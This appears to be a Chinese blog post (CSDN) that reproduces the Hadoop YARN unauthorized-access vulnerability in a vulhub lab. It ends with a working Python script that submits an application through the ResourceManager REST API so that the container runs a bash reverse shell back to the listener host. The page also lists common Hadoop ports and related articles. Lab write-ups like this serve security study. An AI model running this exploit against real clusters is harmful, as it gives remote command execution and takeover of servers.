Hadoop_unauthorized-yarn

最新推荐文章于 2024-07-25 11:17:10 发布
最新推荐文章于 2024-07-25 11:17:10 发布
阅读量742 收藏 1
点赞数
文章标签: hadoop hdfs 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56895581/article/details/130775447
版权

Hadoop-未授权访问

漏洞简介

​ hadoop是一个有apache基金会开发的分布式文件系统,一个存储系统+计算框架的软件框架。主要解决海量数据存储与计算的问题,yarn是搭建在其上的对集群资源实现同一管理的资源管理平台。由于服务器的配置不当开放了HFDS的50070及相关服务端口,导致攻击者可以利用命令行直接操作多个目录下的数据(删除、下载、甚至命令执行)

适用版本

2.9.0 <= Apache Hadoop <= 2.10.1``3.0.0-alpha <= Apache Hadoop <= 3.2.3``3.3.0 <= Apache Hadoop <= 3.3.3

搭建环境

本地虚拟机:ubuntu:192.168.253.250

搭建工具:docker-compose

靶场环境:vulhub

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WTjgmEXR-1684508902067)(Hadoop_unauthorized-yarn.assets/image-20230507105159174.png)]

攻击主机:centos7.0 :192.168.253.145

监听主机:kali :192.168.253.135

漏洞复现:

  • 开启漏洞环境并查看相关配置

在这里插入图片描述

  • 访问对应的8088端口:
    在这里插入图片描述

  • 访问就跳转到cluster目录,我们继续访问当前目录的apps路径,如果存在则说明有未授权访问

在这里插入图片描述

  • 确认存在之后准备反弹shell操作,使用kali监听端口4444:

在这里插入图片描述

  • centos使用脚本进行攻击(这里可以直接使用kali执行脚本,我真是个大聪明。。。代码附文末):

在这里插入图片描述

  • 查看监听结果,拿到shell:

在这里插入图片描述

  • 同时在网站页面上出现记录:
    在这里插入图片描述

  • 附脚本:

import requests
target = 'http://192.168.253.250:8088/' #http://远端服务器的ip:port
lhost = '192.168.253.135' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/4444 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

关于hadoop常见端口:

  • 50070:Hadoop的常用WEB UI管理端口,用户可通过此端口浏览hadoop的大致情况和对其调整
  • 8020:Hadoop的nameNode端口,是负责管理Hadoop的文件系统,通过此端口可访问hadoop的文件系统
  • 8030:Hadoop的资源管理端口,负责管理Hadoop的集群资源、内存和cpu等,通过此端口用户可以访问ResourseManager
  • 8088:hadoop的ApplicationManager(应用管理器)端口,负责协调应用程序的执行,同错此端口用户可以访问hadoop的ApplicationManager查看应用状态、日志等信息
  • 9000:hadoop的HDFS( document file system)端口,负责存储Hadoop的集群的资源,通过此端口用户可以访问HDFS进行文件操作。
  • 9000:hadoop的HDFS( document file system)端口,负责存储Hadoop的集群的资源,通过此端口用户可以访问HDFS进行文件操作。
木敏
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 授权访问漏洞复现
qq_51577576的博客
09-03 1450
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC授权访问漏洞复现 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。...
Hadoop-3.1.1 Yarn 对GPU的调度和管理
weixin_41939278的博客
09-28 4349
GPU ON YARN上的配置 hadoop-3.1.1版本的yarn支持对gpu的调度和管理,主要分为两种模式: yarn自动获取gpu的资源,进行分配; 由用户指定使用哪些gpu资源; 具体的配置方法详见文档 Using GPU On YARN.md GPU ON YARN 上的执行 执行命令: yarn jar /home/nht/hadoop-3.1.1/share/hadoop/ya...
Hadoop-yarn-授权访问漏洞复
2301_76467680的博客
06-26 960
然后sudo nc -lvvp 4444#在攻击机上用NC工具开启4444侦听端口。然后docker-compose up -d拉取环境。这个是exp写入靶场目录下的exploit.py里面。192.168.127.131:8088#执行exp。用whoami命令显示我们的权限为root。docker ps查看镜像是否启动。先进入vluhub里的靶场目录。然后虚拟机ip+端口去访问页面。就可以反弹shell了。
二百四十、Hadoop——解决Hadoop 授权访问漏洞
tiantang2renjian的博客
06-24 1105
Hadoop——解决Hadoop 授权访问漏洞
Hadoop-yarn-授权访问漏洞
Biu_Biu_Bi的博客
01-04 3201
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop-yarn-授权访问漏洞复现(vulhub)
weixin_43061533的博客
12-15 7074
0x01 漏洞简述 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 HDFS是一个分布式文件系统,具有高容错性的特点,并且被设计用来部署在廉价的硬件上;而且它能够以高吞吐量来访问应用程序的数据,尤其适合那些有着超大数据集的应用程序。MapReduce是一个使用简易的软件框架,基...
Hadoop Yarn RPC远程命令执行
Fly_鹏程万里
11-25 5867
影响范围 Hadoop Yarn RPC 漏洞类型 远程命令执行 利用条件 可授权访问 漏洞概述 2021年11月15日,有安全研究人员披露Hadoop Yarn RPC存在授权访问漏洞,此漏洞存在于Hadoop的核心组件Hadoop Yarn中,因Hadoop Yarn默认对外开放RPC服务,导致远程攻击者可利用此授权漏洞并通过RPC服务执行任意命令,从而达到控制目标服务器的目的,鉴于此漏洞为高危状态,危害较大,且细节已公开、被在野利用,建议所有使用Apache Hadoop的用户及时
Hadoop Yarn RPC授权访问漏洞
m0_67403272的博客
03-25 1549
Hadoop Yarn RPC授权访问漏洞 ?? 漏洞详情 ??影响版本 ?? 复现环境 ??FOFA语法 ??漏洞利用 ??漏洞修复 ?? 漏洞详情 Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。 Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC服务
hadoop-2.6.0-cdh5.5.2安装
小强签名设计 的博客
05-05 2517
我这里是在Debian8.6.0版本的Linux操作系统下安装的hadoop-2.6.0-cdh5.5.2cdh5系列下载地址:http://archive.cloudera.com/cdh5/cdh/5/正真的第一步应该是同步时间,同步后得重启,否则的话会运行mr的时候会卡主不动,不同步运行mr的时候会报错:(红帽的话防火墙和selinux是否关闭,这都可能在安装中会报错,但Debian安装后防...
hadoop-yarn-client-2.6.5-API文档-中文版.zip
05-01
赠送jar包:hadoop-yarn-client-2.6.5.jar; 赠送原API文档:hadoop-yarn-client-2.6.5-javadoc.jar; 赠送源代码:hadoop-yarn-client-2.6.5-sources.jar; 赠送Maven依赖信息文件:hadoop-yarn-client-2.6.5.pom;...
sqoop-1.4.6.bin__hadoop-2.0.4-alpha.zip
09-22
这个压缩包 "sqoop-1.4.6.bin__hadoop-2.0.4-alpha.zip" 包含的是Sqoop 1.4.6版本,针对Hadoop 2.0.4-alpha版本优化的二进制发行版。 **Sqoop 的核心功能:** 1. **数据导入**:Sqoop 提供了命令行接口,可以将结构...
hadoop-yarn-common-2.6.5-API文档-中文版.zip
04-07
赠送jar包:hadoop-yarn-common-2.6.5.jar 赠送原API文档:hadoop-yarn-common-2.6.5-javadoc.jar 赠送源代码:hadoop-yarn-common-2.6.5-sources.jar 包含翻译后的API文档:hadoop-yarn-common-2.6.5-javadoc-...
hadoop-yarn-api-2.5.1-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-api-2.5.1.jar; 赠送原API文档:hadoop-yarn-api-2.5.1-javadoc.jar; 赠送源代码:hadoop-yarn-api-2.5.1-sources.jar; 赠送Maven依赖信息文件:hadoop-yarn-api-2.5.1.pom; 包含翻译后...
hadoop-yarn-api-python-client:Hadoop:registered:YARN API的Python客户端
05-08
hadoop-yarn-api-python-client 适用于ApacheHadoop:registered:YARN API的Python客户端 软件包文档: REST API文档: 兼容性库与Apache Hadoop 3.2.1兼容。 如果您使用的版本不是上述版本(或类似Hortonworks的供应...
Hadoop NameNode 进入 Safe Mode 的问题分析与解决方案
最新发布
marsjin的专栏
07-25 753
通过以上步骤,您可以有效地解决 Hadoop NameNode 进入 Safe Mode 的问题,确保集群能够正常运行。如果问题仍然存在,建议进一步检查集群的整体健康状况,并寻求专业人员的帮助。希望本文能够帮助您快速解决问题,让您的大数据处理任务顺利进行!
Hadoop、Hive、HBase、数据集成、Scala阶段测试
m0_58050808的博客
07-24 1031
ResourceManager 是 YARN 架构中的核心组件之一,负责接收客户端提交的作业(如 MapReduce 任务、Spark 任务等),并为这些作业分配资源(如内存、CPU)以在集群中的 NodeManager 上执行。spark的任务调度流程:driver端,遇到action算子触发任务执行,将任务提交到有向无环图,DAGscheduler中,根据RDD的血缘关系划分划分stage,将RDD中的分区封装成taskset任务,发送到TASKscheduler。
WPF前端:一个简单的数值设置样式卡片,支持MVVM绑定
XX_YYDS的博客
07-24 506
WPF前端:数值设置卡片样式,支持MVVM绑定
C# WPF入门学习主线篇(七)—— Label常见属性和事件
weixin_56595425的博客
06-07 1826
在《C# WPF入门学习主线篇(七)—— Label常见属性和事件》一文中,我们详细探讨了 WPF 中 `Label` 控件的常见属性和事件,包括 `Content`、`FontSize`、`Foreground`、`Background` 等属性,以及 `MouseEnter`、`MouseLeave`、`MouseDown` 和 `KeyDown` 等事件。通过丰富的示例代码,本文帮助读者掌握如何自定义 `
hadoop-yarn-client
07-06
Hadoop-YARN-Client的作用是允许用户通过编程方式与YARN交互,以便向集群提交应用程序,并监控和管理它们的执行。通过Hadoop-YARN-Client,用户可以以编程方式与YARN的应用程序客户端接口(API)进行交互,完成下列...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值